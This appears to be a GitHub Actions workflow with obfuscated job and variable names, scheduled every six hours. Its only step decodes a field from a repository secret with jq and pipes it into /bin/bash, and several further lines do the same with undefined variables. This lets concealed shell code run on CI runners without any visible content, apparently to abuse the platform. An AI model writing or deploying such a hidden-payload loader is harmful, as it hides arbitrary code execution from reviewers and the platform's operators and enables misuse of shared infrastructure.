name: tongsuishi1238
on:
  workflow_dispatch:
  schedule:
    - cron: '36 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tongsuishi1238
        env:
          xd47135: ${{ secrets.xd47135 }}
        run: |
          echo $xd47135 | jq -r .hsya6 | /bin/bash
          echo $zhl54 | jq -r .kbh6151 | /bin/bash
          echo $fiwo80209 | jq -r .dibg28990 | /bin/bash
          echo $lqlz9507 | jq -r .ap6 | /bin/bash
          echo $b6 | jq -r .o79 | /bin/bash

